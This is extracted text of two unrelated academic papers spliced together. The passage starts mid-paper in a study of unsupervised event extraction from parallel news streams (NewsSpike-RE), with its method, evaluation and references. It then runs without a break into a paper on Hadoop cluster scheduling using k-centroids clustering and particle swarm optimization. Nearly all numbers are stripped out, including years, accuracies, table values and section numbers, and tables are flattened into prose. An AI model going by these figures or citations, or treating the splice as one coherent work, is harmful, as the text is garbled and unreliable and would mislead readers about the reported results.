where z_x is the normalization constant and the parameter vector Θ is the weight vector of the features in Φ_in and Φ_cross, which are log-linear functions. the joint factor Φ_joint is zero when y_p = 0 but some z_sp = 1; otherwise, it is set to 1. we use integer linear programming to perform map inference on the model, finding the predictions y, z that maximize the probability.

. learning from heuristic labels

we now present the learning algorithm for our joint cluster model. the goal of the learning algorithm is to set Θ for the log-linear functions in the factors in a way that maximizes the likelihood. we do this in a totally unsupervised manner, since manual annotation is expensive and does not scale to large numbers of event relations. the weights are learned in three steps: (1) newsspike-re creates a set of heuristic labels for a subset of variables in the graphical model; (2) it uses the heuristic labels as supervision for the model; (3) it updates Θ with the perceptron learning algorithm. the weights are used to infer the values of the variables that don't have heuristic labels. the procedure is summarized in figure .

figure : learning from heuristic labels. input: newsspikes and the connected components of the model. heuristic labels: (1) find positive and negative phrases and sentences p+, p−, s+, s−; (2) label the connected components accordingly and create {(y_i^label, z_i^label)}, i = 1..m. learning: update Θ with the perceptron learning algorithm. output: the values of all variables in the connected components via map inference.

for each event relation e = e(t1, t2), newsspike-re creates heuristic labels as follows:
(1) p+: the temporal functionality heuristic (zhang and weld, ) says that if an event phrase p co-occurs with e in the newsspikes, it tends to be a paraphrase of e. we add the most frequently co-occurring event phrases to p+. p+ also includes e itself. (2) p−: the temporal negation heuristic says that if p and e co-occur in a newsspike but one of them is in its negated form, p should be negatively labeled. we add those event phrases to p−. if a phrase p appears in both p+ and p−, we remove it from both sets. (3) s+: we first get the positive newsspikes from the solution of the edge-cover problem in section . we treat the newsspike η as positive if the edge between η and e is covered. next, every sentence with p ∈ p+ is added into s+. (4) s−: since the event relations discovered in section tend to be distinct relations, a sentence is treated as a negative sentence for e if it is heuristically labeled as positive for some e′ ≠ e. in addition, s− includes all sentences with p ∈ p−.

with p+, p−, s+, s−, we define the heuristically labeled set to be {(y_i^label, z_i^label)}, i = 1..m, where m is the number of connected components with corresponding event phrases p ∈ p+ ∪ p−; y_i^label = 1 if p ∈ p+ and y_i^label = 0 if p ∈ p−. z_i is labeled similarly, but note that if a sentence in the connected component does not exist in s+ ∪ s−, newsspike-re does not include the corresponding variable in z_i^label. with {(y_i^label, z_i^label)}, i = 1..m, learning can be done with maximum likelihood estimation as l(Θ) = log ∏_i p(y_i = y_i^label, z_i = z_i^label | x_i, Θ). following (collins, ), we use a fast perceptron learning approach to update Θ. it consists of iterating two steps: (1) map inference given the current weights; (2) penalizing the weights if the inferred assignments are different from the heuristically labeled assignments.

sentential event extraction

as shown in figure , we learn the extractors from the generated training sentences. note that most distant supervised approaches (hoffmann et al., ; surdeanu et al., ) use multi-instance, aggregate-level training (i.e., the supervision comes from labeled sets of instances instead of individually labeled sentences). coping with the noise inherent in these multi-instance bags remains a big challenge for distant supervision. in contrast, our sentence-level training data is more direct and minimizes noise. therefore, we implement the event extractor as a simple multi-class, l -regularized logistic regression classifier.

for the features of the classifier, we use the lexicalized dependency paths, the openie phrases, the minimal subtree of the dependency parse, and the bag-of-words between the arguments. we also augment them with fine-grained argument types produced by figer (ling and weld, ). the event extractor that is learned can take individual test sentences (s, a1, a2) as input and predict whether that sentence expresses the event between (a1, a2).

empirical evaluation

our evaluation addresses two questions. section . considers whether our training generation algorithm identifies accurate and diverse sentences. then, section . investigates whether the event extractor, learned from the training sentences, outperforms other extraction approaches.
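a minimal sketch of such a sentential extractor with scikit-learn is shown below. it assumes the generated training sentences have already been converted into sparse feature dictionaries of the kinds listed above (dependency paths, bag-of-words, figer types), uses an l2 penalty, and adds a "none" class for argument pairs that express no event; these choices are illustrative rather than the exact configuration used.

```python
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

def train_extractor(train_feature_dicts, train_labels):
    """train_feature_dicts: one dict of sparse features per training sentence,
    e.g. {"dep_path=<-poss-trip-prep_to->": 1, "arg1_type=person": 1, ...}
    train_labels: event-relation name per sentence, plus a "NONE" class.
    Returns a fitted multi-class, L2-regularized logistic regression pipeline."""
    model = make_pipeline(
        DictVectorizer(sparse=True),
        LogisticRegression(penalty="l2", C=1.0, max_iter=1000),
    )
    model.fit(train_feature_dicts, train_labels)
    return model

def extract(model, sentence_feature_dict, threshold=0.5):
    """Predict an event for one (sentence, arg1, arg2) candidate, or None."""
    probs = model.predict_proba([sentence_feature_dict])[0]
    best = probs.argmax()
    label = model.classes_[best]
    if label == "NONE" or probs[best] < threshold:
        return None
    return label
```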
experimental setup

we follow the procedure described in (zhang and weld, ) to collect parallel news streams and generate the newsspikes: first, we get news seeds and query the bing newswire search engine to gather additional, time-stamped news articles on a similar topic; next, we extract openie tuples from the news articles and group the sentences that share the same arguments and date into newsspikes. we collected the news stream corpus from march st to july st . we split the dataset into two parts: in the training phase, we use the news streams in (named ns ) to generate the training sentences. ns has k newsspikes containing k sentences. we evaluated the extraction performance on news articles collected in (named ns ). in this way, we make sure the test sentences are unseen during training. there are million sentences in ns . we randomly sample k unique sentences having two different arguments recognized by the named entity recognition system.

for our event discovery algorithm, we set the number of event relations to be and ran the algorithm on ns . the algorithm takes seconds to run on a . ghz cpu. note that most previous unsupervised relation discovery algorithms require additional manual post-processing to assign names to the output clusters. in contrast, newsspike-re discovers the event relations fully automatically and the output is self-explanatory. we list them together with the by-event extraction performance in table . from the table, we can see that most of the discovered event relations are salient, with little overlap between relations. while we arbitrarily set k to in our experiments, there is no inherent limit to the number of relation phrases as long as the news corpus provides sufficient support to learn an extractor for each relation. in future, we plan to explore much larger sets of event relations to see if the extraction accuracy is maintained.

the joint cluster model that identifies training sentences for each event relation e = e(t1, t2) uses cosine similarity between the event phrase p of a sentence and the canonical phrases of each relation as features in the phrase factors in figure (a). it also includes the cosine similarity between p and a set of "anti-phrases" for the event relation, which are recognized by the temporal negation heuristic. for the in-spike factor, we measure whether the fine-grained argument types of the sentence returned by the figer system match the required ti. in addition, we implement the features from (zhang and weld, ) to measure whether the sentence is describing the event of the newsspike. for the cross-spike factors, we use textual similarity features between the two sets of parallel sentences to measure the distance between the pair of newsspikes.

. quality of the generated training set

the key to a good learning system is a high-quality training set. in this section, we compare our joint model against pipeline systems that consider paraphrases and argument type matching sequentially, based on the following paraphrasing techniques.

table : quality of the generated training sentences (count, micro- and macro-accuracy), where "all" includes sentences with all event phrases and "diverse" are those with distinct event phrases. rows: basic, yates, ganit, zhang, newsspike-re, and the w/o cross and w/o neg ablations; columns: # / mi. / ma. under the "all" and "diverse" conditions.

basic is based on the temporal functionality heuristic of (zhang and weld, ).
it treats all event phrases appearing in the same newsspike as paraphrases. yates uses resolver (yates and etzioni, ) to create clusters of phrases. resolver measures the similarity between the phrases by means of both distributional features and textual features. we convert the sentences in newsspikes into tuples of the form (a1, p, a2) and run resolver on these tuples to generate the paraphrases. zhang: we used the generated paraphrase set from (zhang and weld, ). ganit: ganitkevitch et al. ( ) released a large paraphrase database (ppdb) based on exploiting bilingual parallel corpora. note that some of these paraphrasing systems do not handle dependency paths, so when p is a dependency path we use the surface string between the arguments as the phrase. newsspike-re: we also conduct ablation testing on newsspike-re to measure the effect of the cross-spike factors and the temporal negation heuristic: w/o cross uses a simpler model that removes the cross-spike factors of newsspike-re; w/o negation uses the same joint cluster model as newsspike-re but removes the features and the heuristic labels coming from the temporal negation heuristic.

we measured the micro- and macro-accuracy of each system by manually labeling randomly chosen output from each system (two odesk workers were asked to label the dataset; a graduate student then reconciled any disagreements). annotators read each training sentence and decided if it was a good example for a particular event. we also report the number of generated sentences. since the extractor should generalize over sentences with dissimilar expressions, it is crucial to identify sentences with diverse event phrases.

table : performance of extractors by event relation, reporting f at maximum recall, area under the pr curve, and area under the diverse pr curve for r , r p, and newsspike-re (labeled n-re), together with the number # of true extractions in the pool of sampled output; micro and macro averages are included. newsspike-re outperforms two implementations of riedel's universal schemas (see section . for details). the advantage of newsspike-re over universal schemas is greatest on a diverse test set where each sentence has a distinct event phrase. the discovered event relations are: acquire(organization, person); arrive in(organization, location); arrive in(person, location); beat(organization, organization); beat(person, person); buy(organization, organization); defend(person, person); die at(person, number); die(person, time); fire(organization, person); hit(event, location); lead(person, organization/sports team); leave(person, organization); meet with(person, person); nominate(person/politician, person); pay(organization, money); place(organization, person); play(person/artist, person); release(organization, person); replace(person, person); report(government agency, time); report(written work, time); return to(person/athlete, location); shoot(person, number); sign with(person, organization); sign(organization, person); unveil(organization, product); vote(government, time); win at(person, location); win(person, event).
therefore we also measured accuracy and counts under a "diverse" condition, considering only the subset of sentences with distinct event phrases. table shows the accuracy and the number of training examples. the basic temporal system brings us . / . micro- and macro-accuracy overall and . / . in the diverse condition. it shows that newsspikes are a promising resource for generating the training set, but that elaboration is necessary. yates gets . / . accuracy overall because its textual features help it to recognize many good sentences with similar phrases. but in the diverse condition it gets lower precision, because the distributional hypothesis fails to distinguish correlated but different phrases. although ganitkevitch and zhang leverage existing paraphrase databases, it is interesting that their accuracy is still not good. this is largely because the paraphrasing often depends on context: e.g., "cutler hits martellus bennett with td in closing seconds." is not a good example for the beat(team, team) relation, even though hit is a synonym for beat in general. these two systems show that it is not enough to use an off-the-shelf paraphrasing database for extraction. the ablation test shows the effectiveness of the temporal negation heuristic: after turning off the relevant features and heuristic labels, the precision drops by about percentage points. in addition, the cross-spike factors bring newsspike-re about % more training sentences and also increase the accuracy.

we did bootstrap sampling to test the statistical significance of newsspike-re's improvement in accuracy over each comparison system and ablation of newsspike-re. for each system we computed the accuracy of samples of labeled outputs. we then ran the paired t-test over the accuracy numbers of each other system compared to newsspike-re. for all but w/o cross the improvement is strongly significant, with p-value less than %. the increase in accuracy compared to w/o cross has borderline significance (p-value . %), but is a clear win given its % increase in training size.

. performance of the event extractors

most previous relation extraction approaches either require a manually labeled training set, or work only on a pre-defined set of relations that have ground instances in kbs. the closest work to newsspike-re is universal schemas (riedel et al., ), which addresses the limitation of distant supervision that the relations must exist in kbs. their solution is to treat the surface strings, dependency paths, and relations from kbs as equal "schemas", and then to exploit the correlation between the instances and the schemas in a very large unlabeled corpus. in their paper, riedel et al. evaluated only on static relations from freebase and achieve state-of-the-art performance. but universal schemas can be adapted to handle events, by introducing the events as schemas and heuristically finding seed instances. we set up a competing system (r ) as follows: (1) we take the nytimes corpus published between and (sandhaus, ), the dataset used by riedel et al. ( ) containing . million ny times articles; (2) the instances (i.e.
the rows of the matrix) come from the entity pairs from the news ar- ticles; ( ) there are two types of columns: some are the extraction features used by newsspike-re, in- cluding the lexicalized dependency paths described in riedel et al.; others are event relations e = e(t , t ); ( ) for an entity pair (a ,a ), if there is an openie extraction (a ,e,a ) and the entity types of (a ,a ) match (t , t ), we assume the event rela- tion e is observed on that instance. as shown in table , parallel news streams are a promising resource for clustering because of the strong correlation between the instances and the event phrases. we train another version of universal schemas r p on the parallel news streams ns . in particular, entity pairs from different newsspikes are used as different rows in the matrix. we would like to measure the precision and re- call of the extractors. but note that it is impos- sible to fully label all the sentences, so we follow the “pooling” technique described in (riedel et al., ) to create the labeled dataset. for every com- peting system, we sample top outputs for every event relation and add this to the pool. the anno- tators are shown these sentences and asked to judge whether the sentence expresses the event relation or not. after that, the labeled set become “gold” and can be used to measure the precision and pseudo- recall. there are in all , distinct sentences in the pool, since some outputs are produced by mul- tiple systems. among them, , sentences are la- beled as positive. in table , the # columns show the number of true extractions in the pool for every event relation. similar to the diverse condition in table , it is important that the extractor can correctly predict on diverse sentences that are dissimilar to each other. thus we conducted a “diverse pooling”: for each system, we report numbers for the sentences with different dependency paths between the arguments for every discovered event. figure (a) shows the precision pseudo-recall curve for all sentences for the three systems. newsspike-re outperforms the competing sys- tems by a large margin. for example, the area un- der the curve (auc) of newsspike-re for all sen- tences is . while that of r p and r are . and . . this is a % increase over r p and . times the area compared to r . similar increases in auc are observed on diverse sentences. table further lists the breakdown numbers for each event relation, as well as the micro and macro average. although universal schemas had some success for several relations, newsspike-re achieved the best f for out of event relations; best auc for out of . the advantage is even greater in the di- verse condition. it is interesting to see that r p performs much better than r , since the data com- ing from nytimes is much noisier. a closer look shows that universal schemas tends to confuse correlated but different phrases. newsspike-re, however, rarely made these errors because our model can effectively exploit negative evidence to distinguish them. . . comparing to distant supervision although the most event relations in table can- not be handled by the distant supervised approach, it is possible to match buy(org,org) to freebase re- lations with appropriate database operators such as . . . . . . . . . . . . r : uschema on nyt r p: uschema on ns newsspike-re on ns pseudo recall p re c is io n (a) . . . . . . . . . . . . 
r : uschema on nyt r p: uschema on ns newsspike-re on ns pseudo recall p re c is io n ds on nyt (b) figure : precision pseudo-recall curves for (a) all event relations; (b) buy(org, org), this figure includes the distant supervision algorithm miml learned from matching the freebase relation to the new york times. newsspike-re has auc . , more than doubling r ( . ) and % higher than r p ( . ) for all event relations. join and select (zhang et al., ). to evaluate how distant supervision performs, we introduce the system ds on nyt based on a manual mapping of buy(org,org) to the join relation in freebase. then we match its instances to nytimes articles and fol- low the steps of surdeanu et al. ( ) to train the extractor. the matching to nytimes brings us positive instances having , sentences, but unfortunately the sentence-level accuracy is only % based on examination of random sentences. figure (b) shows the pr curves for all the competing systems. distant supervision predicts the top extractions cor- rectly because the multi-instance technique recog- nizes some common expressions (e.g. buy, acquire), but the precision drops dramatically since most pos- itive expressions are overwhelmed by the noise. conclusions and future work popular distant supervised approaches have limited ability to handle event extraction, since fluent facts are highly time dependent and often do not exist in any kb. this paper presents a novel unsupervised approach for event extraction that exploits parallel news streams. our newsspike-re system auto- matically identifies a set of argument-typed events from a news corpus, and then learns a sentential (micro-reading) extractor for each event. we introduced a novel, temporal negation heuris- tic for parallel news streams that identifies event phrases that are correlated, but are not paraphrases. we encoded this in a probabilistic graphical model /organization/organization/companies_ acquired /business/acquisition/company_acquired to cluster sentences, generating high quality training data to learn a sentential extractor. this provides negative evidence crucial to achieving high preci- sion training data. experiments show the high quality of the gener- ated training sentences and confirm the importance of our negation heuristic. our most important exper- iment shows that we can learn accurate event extrac- tors from this training data. newsspike-re out- performs comparable extractors by a wide margin, more than doubling the area under a precision-recall curve compared to universal schemas. in future work we plan to implement our system as an end-to-end online service. this would allow users to conveniently define events of interest, learn extractors for each event, and return extracted facts from news streams. acknowledgments we thank hal daume iii, xiao ling, luke zettle- moyer and the reviewers. this work was supported by onr grant n - - - , the wrf/cable professorship, a gift from google, and the defense advanced research projects agency (darpa) ma- chine reading program under air force research laboratory (afrl) prime contract no. fa - - c- . any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the view of darpa, afrl, or the us government. references eugene agichtein and luis gravano. . snowball: extracting relations from large plain-text collections. in acm dl, pages – . michele banko, michael j. cafarella, stephen soderland, matthew broadhead, and oren etzioni. . 
open information extraction from the web. in proceedings of the th international joint conference on artificial intelligence (ijcai- ), pages – . regina barzilay and lillian lee. . learning to paraphrase: an unsupervised approach using multiple- sequence alignment. in proceedings of the con- ference of the north american chapter of the associ- ation for computational linguistics on human lan- guage technology (hlt-naacl), pages – . regina barzilay and kathleen r mckeown. . ex- tracting paraphrases from a parallel corpus. in pro- ceedings of the th annual meeting on association for computational linguistics (acl), pages – . edward benson, aria haghighi, and regina barzilay. . event discovery in social media feeds. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics: human language technologies (hlt-naacl), pages – . sergey brin. . extracting patterns and relations from the world wide web. in the world wide web and databases, pages – . andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r. hruschka jr., and tom m. mitchell. . toward an architecture for never- ending language learning. in proceedings of the aaai conference on artificial intelligence (aaai- ). michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the acl- conference on empirical methods in natu- ral language processing-volume , pages – . mark craven and johan kumlien. . constructing biological knowledge bases by extracting information from text sources. in proceedings of the seventh inter- national conference on intelligent systems for molec- ular biology (ismb), pages – . bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in com- putational linguistics, page . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information extraction. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . jenny rose finkel, trond grenager, and christopher manning. . incorporating non-local informa- tion into information extraction systems by gibbs sam- pling. in proceedings of the rd annual meeting on association for computational linguistics (acl), pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in joint human language technology con- ference/annual meeting of the north american chap- ter of the association for computational linguistics (hlt-naacl ), pages – . takaaki hasegawa, satoshi sekine, and ralph grishman. . discovering relations among named entities from large corpora. in proceedings of the nd annual meeting on association for computational linguistics (acl), page . raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of the th an- nual meeting of the association for computational linguistics: human language technologies (hlt- acl), pages – . ruihong huang and ellen riloff. . multi-faceted event recognition with bootstrapped dictionaries. in the conference of the north american chapter of the association for computational linguistics: human language technologies (hlt-naacl), pages – . dekang lin and patrick pantel. . discovery of infer- ence rules for question-answering. natural language engineering, ( ): – . 
xiao ling and daniel s weld. . fine-grained entity recognition. in association for the advancement of artificial intelligence (aaai). david mcclosky, mihai surdeanu, and christopher d manning. . event extraction as dependency pars- ing. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies (hlt-acl), pages – . mike mintz, steven bills, rion snow, and daniel juraf- sky. . distant supervision for relation extrac- tion without labeled data. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . ndapandula nakashole, martin theobald, and gerhard weikum. . scalable knowledge harvesting with high precision and high recall. in proceedings of the fourth acm international conference on web search and data mining (wsdm), pages – . george l nemhauser and laurence a wolsey. . in- teger and combinatorial optimization, volume . wi- ley new york. roi reichart and regina barzilay. . multi event ex- traction guided by global constraints. in proceedings of the conference of the north american chap- ter of the association for computational linguistics: human language technologies (hlt-naacl), pages – . kevin reschke, martin jankowiak, mihai surdeanu, christopher d manning, and daniel jurafsky. . event extraction using distant supervision. in lan- guage resources and evaluation conference (lrec). sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions with- out labeled text. in machine learning and knowledge discovery in databases (ecml), pages – . sebastian riedel, david mcclosky, mihai surdeanu, an- drew mccallum, and christopher d manning. . model combination for event extraction in bionlp . in proceedings of the bionlp shared task workshop, pages – . sebastian riedel, limin yao, benjamin m. mar- lin, and andrew mccallum. . relation extraction with matrix factorization and universal schemas. in joint human language technology con- ference/annual meeting of the north american chap- ter of the association for computational linguistics (hlt-naacl). alan ritter, oren etzioni, sam clark, et al. . open domain event extraction from twitter. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining (kdd), pages – . evan sandhaus. . the new york times annotated corpus. linguistic data consortium. yusuke shinyama and satoshi sekine. . preemp- tive information extraction using unrestricted relation discovery. in proceedings of the main conference on human language technology conference of the north american chapter of the association of com- putational linguistics (hlt-naacl), pages – . mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d manning. . multi-instance multi- label learning for relation extraction. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp), pages – . shingo takamatsu, issei sato, and hiroshi nakagawa. . probabilistic matrix factorization leveraging contexts for unsupervised relation extraction. in ad- vances in knowledge discovery and data mining, pages – . fei wu and daniel s. weld. . autonomously se- mantifying wikipedia. in proceedings of the inter- national conference on information and knowledge management (cikm), pages – . limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. 
in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – . limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense dis- ambiguation. in proceedings of the th annual meet- ing of the association for computational linguistics (acl), pages – . alexander yates and oren etzioni. . unsupervised methods for determining object and relation synonyms on the web. journal of artificial intelligence research, ( ): . congle zhang and daniel s weld. . harvesting par- allel news streams to generate paraphrases of event re- lations. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp), pages – . congle zhang, raphael hoffmann, and daniel s weld. . ontological smoothing for relation extraction with minimal supervision. in association for the ad- vancement of artificial intelligence (aaai). a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster e. laxmi lydia ,dr. m.ben swarup associate professor, department of computer science and engineering, vignan’s institute of information technology, visakhapatnam, andhra pradesh, india. professor, computer science and engineering, vignan’s institute of information technology, visakhapatnam, andhra pradesh, india. email:elaxmi @yahoo.com abstract. big data storage management is one of the most challenging issues for hadoop cluster environments, since large amount of data intensive applications frequently involve a high degree of data access locality. in traditional approaches high-performance computing consists dedicated servers that are used to data storage and data replication. therefore to solve the problems of disparateness among the jobs and resources a “disparateness-aware scheduling algorithm” is proposed in the cluster environment. in this research work we represent k-centroids clustering in big data mechanism for hadoop cluster. this approach is mainly focused on the energy consumption in the hadoop cluster, which helps to increase the system reliability. the hadoop cluster consists of resources which are categorized for minimizing the scheduling delay in the hadoop cluster using the k-centroids clustering algorithm. a novel provisioning mechanism is introduced along with the consideration of load, energy, and network time. by integrating these three parameters, the optimized fitness function is employed for particle swarm optimization (pso) to select the computing node. failure may occur after completion of the successful execution in the network. to improve the fault tolerance service, the migration of the cluster is focused on the particular failure node. this can recomputed the node by pso and the corresponding optimal node is predicted. the experimental results exhibit better scheduling length, scheduling delay, speed up, failure ratio, energy consumption than the existing systems. keywords: k-centroids clustering, big data, hadoop cluster, data access locality, data replication, systemreliability, particle swarm optimization international journal of advanced network monitoring and controls year , no. . introduction in recent years, big data has rapidly developed into a hotspot that attracts great attention from academia, industry, and even governments around the world [ – ]. nature and science have published special issues dedicated to discuss the opportunities and challenges brought by big data [ , ]. 
mckinsey, the well-known management and consulting firm, alleged that big data has penetrated into every area of today’s industry and business functions and has become an important factor in production [ ]. using and mining big data heralds a new wave of productivity growth and consumer impetus. o’reilly media even asserted that “the future belongs to the companies and people that turn data into products”[ ]. some even say that big data can be regarded the new petroleum that will power the future information economy. in short, the era of big data has already been in the offing. what is big data? so far, there is no universally accepted definition. in wikipedia, big data is defined as “an all-encompassing term for any collection of data sets so large and complex that it becomes difficult to process using traditional data processing applications”[ ]. from a macro perspective, big data can be regarded as a bond that subtly connects and integrates the physical world, the human society, and cyberspace. here the physical world has a reflection in cyberspace, embodied as big data, through internet, the internet of things, and other information technologies, while human society generates its big data- based mapping in cyberspace by means of mechanisms like human–computer interfaces, brain–machine interfaces, and mobile internet [ ]. in this sense, big data can basically be classified into two categories, namely, data from the physical world, which is usually obtained through sensors, scientific experiments and observations (such as biological data, neural data, astronomical data, and remote sensing data), and data from the human society, which is often acquired from such sources or domains as social networks, internet, health, finance, economics, and transportation. apache hadoop is a software framework that supports data-intensive distributed applications under a free license. it has been used by many big technology companies, such as amazon, facebook, yahoo and ibm. hadoop [ ] is best known for mapreduce and its distributed file system (hdfs). mapreduce idea is mentioned in a google paper [ ], to be simply the task of mapreduce is another processing of divide and concur. hadoop [ ] is aimed at problems that require examination of all the available data. for example, text analysis and image processing generally require that every single record be read, and often interpreted in the context of similar records. hadoop uses a technique called mapreduce to carry out this exhaustive analysis quickly. hdfs gives the distributed computing storage provides and support. they are the two main subprojects for hadoop platform. .hadoop set fifo algorithm as its default algorithm. according to our research of algorithm for hadoop, we found that it unable to satisfy the demand of users. we cannot only keep the idea of first come first served. we need to think about the requirement form that has the higher priority, but at the same time we also can keep the fairness to other users. then we announced k-centroids clustering algorithm in big data-hadoop cluster. . hadoop and hdfs overview hadoop distributed file system (hdfs)[ ] is the primary storage system used by hadoop applications. the hadoop distributed file system is designed to handle large files (multi-gb) with sequential read/ write operation. each file is broken into chunks, and stored across multiple data nodes as local os track of overall file directory structure and the placement of chunks. datanode reports all its chunks to the namenode at bootup. 
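as a toy illustration of this chunking scheme, the short python sketch below maps a byte offset to a chunk index and looks up the replica datanodes for that chunk in a simulated namenode table; the chunk size, file path, and node names are invented for the example, and the real client/namenode protocol is more involved than this.

# toy illustration of hdfs-style chunking: turn a byte offset into a chunk index
# and ask a simulated namenode which datanodes hold that chunk. all names and
# sizes below are invented for the example.
CHUNK_SIZE = 64 * 1024 * 1024   # 64 mb, a commonly used block size

# simulated namenode metadata: file path -> list of chunk replica locations
namenode = {
    "/logs/clickstream.dat": [
        ["datanode-1", "datanode-3", "datanode-5"],   # chunk 0 replicas
        ["datanode-2", "datanode-4", "datanode-6"],   # chunk 1 replicas
    ],
}

def locate(path, byte_offset):
    chunk_index = byte_offset // CHUNK_SIZE      # which chunk holds this offset
    replicas = namenode[path][chunk_index]       # the namenode answers with datanodes
    return chunk_index, replicas

print(locate("/logs/clickstream.dat", 70 * 1024 * 1024))   # (1, ['datanode-2', 'datanode-4', 'datanode-6'])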
each chunk has a version number which will be increased for all update. therefore, the namenode know if any of the chunks of a datanode is stale those stale chunks will be garbage collected at a later time. to read a file, the client api will calculate the chunk index based on the offset of the file pointer and make a request to the namenode. the namenode will reply which datanodes has a a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. copy of that chunk. from this points, the client contacts the datanode directly without going through the namenode. to write a file, client api will first contact the namenode who will designate one of the replica as the primary (by granting it a lease). the response of the namenode contains who is the primary and who are the secondary replicas. then the client push its changes to all datanodes in any order, but this change is stored in a buffer of each datanode. after changes are buffered at all datanodes, the client send a ― commit‖ request to the primary, which determines an order to update and then push this order to all other secondaries. after all secondaries complete the commit, the primary will response to the client about the success. all changes of chunk distribution and metadata changes will be written to an operation log file at the namenode. this log file maintain an order list of operation which is important for the namenode to recover its view after a crash. the namenode also maintain its persistent state by regularly check- pointing to a file. in case of the namenode crash, a new namenode will take over after restoring the state from the last checkpoint file and replay the operation log. fig. . mapreduce overview the mapreduce frame work [ ] consists of a single master jobtracker and one slave tasktracker per cluster node. the master is responsible for scheduling the jobs’ component tasks in the slaves, monitoring them, and re-executing any failed tasks. the slaves executed the tasks as directed by the master. as mentioned, mapreduce applications are based on a master-slave model [ ]. this part describes the various operations that are performed by a generic application to transform input data into output data according to that model. the user defined map and reduce functions [ ], the map function processes a key/value pairs and return a list of intermediate key/value pairs map(k ,v )—-list(k v ) the reduce function merges all intermediate values having the same intermediate key: reduce (k , list(v ))---list(v ) the jobtracker will first determine the number of splits (each split is configurable, ~ - mb) from the input path, and select some tasktracker based on their network proximity to the data sources, then the job tracker send the task requests to those selected task trackers. each tasktracker will start the map phase processing by extracting the input data from the splits. for each record parsed by the “input format”, it invokes the user provided “map” function, which emits a number of key/value pair in the memory buffer. a periodic wakeup process will sort the memory buffer into different reducer node by invoke the “combine” function. the key/value pairs are sorted into one of the r local files (suppose there are r reducer nodes). when the map task completes (all splits are done), the tasktracker will notify the jobtracker. 
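before turning to the reduce phase, the map/reduce contract described above — map(k1, v1) producing a list of intermediate (k2, v2) pairs, and reduce(k2, list(v2)) merging the values that share an intermediate key — can be illustrated with a minimal, framework-free python word count; the function names and the single-process driver below are our own illustration, not the hadoop api.

# framework-free sketch of the user-defined map and reduce functions described above,
# with word count as the running example; the driver simulates the shuffle/sort step.
from collections import defaultdict

def map_fn(key, value):
    # map(k1, v1) -> list of (k2, v2): here, line offset + line text -> (word, 1) pairs
    for word in value.split():
        yield word.lower(), 1

def reduce_fn(key, values):
    # reduce(k2, list(v2)) -> list of v3: merge all counts that share the same word
    yield key, sum(values)

def run_job(records):
    intermediate = defaultdict(list)
    for offset, line in records:                 # "map phase" over all input splits
        for k2, v2 in map_fn(offset, line):
            intermediate[k2].append(v2)          # group by intermediate key (shuffle/sort)
    output = {}
    for k2, values in intermediate.items():      # "reduce phase", one call per key
        for k3, v3 in reduce_fn(k2, values):
            output[k3] = v3
    return output

records = [(0, "big data on hadoop"), (19, "hadoop uses mapreduce")]
print(run_job(records))   # {'big': 1, 'data': 1, 'on': 1, 'hadoop': 2, 'uses': 1, 'mapreduce': 1}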
when all the tasktrackers are done, the jobtracker will notify the selected tasktrackers for the reduce phase. each tasktracker will read the region files remotely. it sorts the key/value pairs and for each key, it invokes the “reduce” function, which collects the key/aggregated value into the output file (one per reducer node). fig. . related work hadoop’s mapreduce operation is initiative requesting from tasktracker to jobtracker .the principle is similar to ordinary, non-preemptive scheduling operating system, which is cannot be interrupt once the task is assigned. as what i have learned about the hadoop algorithms, there are four classic algorithms. . first in first out (fifo): this expression describes the principle of a queue processing technique or servicing conflicting demands by ordering process by first come, first served behavior, what comes in first is handled first, what comes in next waits until the first is finished. this is the default algorithm in hadoop. a disparateness-aware scheduling using k-centroids clustering and pso techniques in hadoop cluster international journal of advanced network monitoring and controls year , no. . round robin (rr): in computer operation, one method of having different program process take turns using the resources of the computer is to limit each process to a certain short time period, then suspending that process to give another process a turn (or “time-slice”). this is often described as round-robin process scheduling. . height priority first (hpf): the algorithm scheduling process, each will be assigned to handle the highest priority ready process. priority setting for the number of static when it can be dynamic. static priority number is in the process of creation is based on the initial characteristics of the process or user requirements identified in the process cannot be changed during operation. dynamic priority number refers to the process and then create an initial priority to determine when the first number, after running in the process as the process characteristics change. . weighted round robin (wrr): weighted round robin is a scheduling discipline. each packet flow or connection has its own packet queue in a network interface card. it is the simplest approximation of generalized. while gps serves infinitesimal amounts of data from each nonempty queue, wrr serves a number of packets for each nonempty queue. . disparateness aware scheduling approach in hadoop cluster environment this section explains the overall flow description of the proposed disparateness-aware scheduling approach in cluster environment. initially, the disparateness cluster environment is created along with the properties of resource such as resource type, processing speed, and the memory. in order to avoid the scheduling delay, the system needs to form a cluster using the k-centroids clustering. depending up on higher priorities, the node will move to the cluster. furthermore, the cosine similarity is finding out to compute the clusters. after accomplishing the cluster, the fitness function is estimated with the consideration of load, energy, and time for each cluster. thus, the clusters are scheduled and then executed after uploading the load. once any failure occurs during the process, the value must recomputed using pso and predicted another optimal node. figure depicts the overall flow diagram of the proposed methodology. the major components of the proposed system are briefly discussed as follows: table. symbols and its descriptions . 
k-centroids clustering
